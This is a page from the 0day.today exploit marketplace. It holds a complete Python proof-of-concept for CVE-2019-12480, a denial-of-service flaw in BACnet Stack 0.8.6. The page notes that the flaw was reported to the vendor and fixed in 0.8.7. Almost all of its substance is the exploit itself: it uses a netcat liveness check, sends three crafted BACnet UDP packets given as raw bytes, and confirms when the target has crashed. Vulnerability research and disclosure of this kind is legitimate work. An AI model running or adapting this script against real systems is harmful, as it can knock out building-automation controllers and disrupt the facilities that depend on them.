0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
BACnet Stack 0.8.6 - Denial of Service Exploit
Author
Risk
[Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: BACnet Stack 0.8.6 - Denial of Service
# Google Dork: [if applicable]
# Date: 2019-07-19
# Exploit Author: mmorillo
# Vendor Homepage: https://sourceforge.net/p/bacnet/
# Software Link: https://sourceforge.net/projects/bacnet/files/bacnet-stack/bacnet-stack-0.8.6/
# Version: bacnet-stack-0.8.6
# Tested on: Linux
# CVE: CVE-2019-12480
#!/usr/bin/env python
#
# After reported the bug to the vendor, sharing details
# about the vulnerability, as well as proof-of-concept code (exploit code to
# test), has been release a fix for 0.8.7 release of
# BACnet Protocol Stack https://sourceforge.net/p/bacnet/
import socket
import struct
import argparse
import os
import sys
from termcolor import colored
#------------------------------------------------------------------------------
# Command line parser using argparse
#------------------------------------------------------------------------------
def cmdline_parser():
parser = argparse.ArgumentParser(conflict_handler='resolve', add_help=True,
description='BACnet Protocol Stack Segmentation fault leading to denial of service', version='0.1',
usage="python %(prog)s")
# Mandatory
parser.add_argument('Server', type=str, help='BACnet server IP')
parser.add_argument('Port', type=str, help='BACnet port')
return parser
def get_Host_name_IP():
try:
host_name = socket.gethostname()
host_ip = socket.gethostbyname(host_name)
return host_ip
except:
print("Unable to get Hostname and IP")
def target_alive(BACnetServer, BACnetPort):
response = os.system("nc -u -z -w 1 " + BACnetServer + " " + str(BACnetPort))
if response == 0:
return True
else:
return False
#------------------------------------------------------------------------------
# Main of program
#------------------------------------------------------------------------------
def main():
# Get the command line parser.
parser = cmdline_parser()
# Show help if no args
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
# Get results line parser.
results = parser.parse_args()
BACnetServer = results.Server
BACnetPort = int(results.Port)
SRC_IP = get_Host_name_IP()
if not target_alive(BACnetServer, BACnetPort):
print((colored("[+] BACnet server down", "yellow")))
else:
if target_alive(BACnetServer, BACnetPort):
payload_DeviceCommunicationControl = "\x81\x0a\x00\x16\x01\x04\x00\x05\x01\x11\x0d\xff\x80\x00\x03\x1a\x0a\x19\x00\x2a\x00\x41"
print((colored("[+] Sending BACnet DeviceCommunicationControl payload from " + SRC_IP, "green")))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
s.connect((BACnetServer, BACnetPort))
s.send(struct.pack('>I',len(payload_DeviceCommunicationControl)))
s.send(payload_DeviceCommunicationControl)
print((colored("[+] Sent Payload: " + payload_DeviceCommunicationControl.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))
if target_alive(BACnetServer, BACnetPort):
payload_AtomicReadFile = "\x81\x0a\x00\x1b\x01\x14\x00\x05\x01\x06\xc4\x02\x80\x00\x00\x0e\x35\xff\xdf\x62\xee\x00\x00\x22\x05\x84\x0f"
print((colored("[+] Sending BACnet AtomicReadFile payload from " + SRC_IP, "green")))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
s.connect((BACnetServer, BACnetPort))
s.send(struct.pack('>I',len(payload_AtomicReadFile)))
s.send(payload_AtomicReadFile)
print((colored("[+] Sent Payload: " + payload_AtomicReadFile.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))
if target_alive(BACnetServer, BACnetPort):
payload_AtomicWriteFile = "\x81\x0a\x00\x1b\x01\x04\x00\x05\x02\x07\xc4\x02\x80\x00\x00\x0e\x35\xff\x5e\xd5\xc0\x85\x0a\x62\x64\x0a\x0f"
print((colored("[+] Sending BACnet AtomicWriteFile payload from " + SRC_IP, "green")))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
s.connect((BACnetServer, BACnetPort))
s.send(struct.pack('>I',len(payload_AtomicWriteFile)))
s.send(payload_AtomicWriteFile)
print((colored("[+] Sent Payload: " + payload_AtomicWriteFile.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))
if not target_alive(BACnetServer, BACnetPort):
print((colored("[+] DoS completed", "red")))
#------------------------------------------------------------------------------
# Main
#------------------------------------------------------------------------------
if __name__ == '__main__':
main()
# 0day.today [2024-12-28] #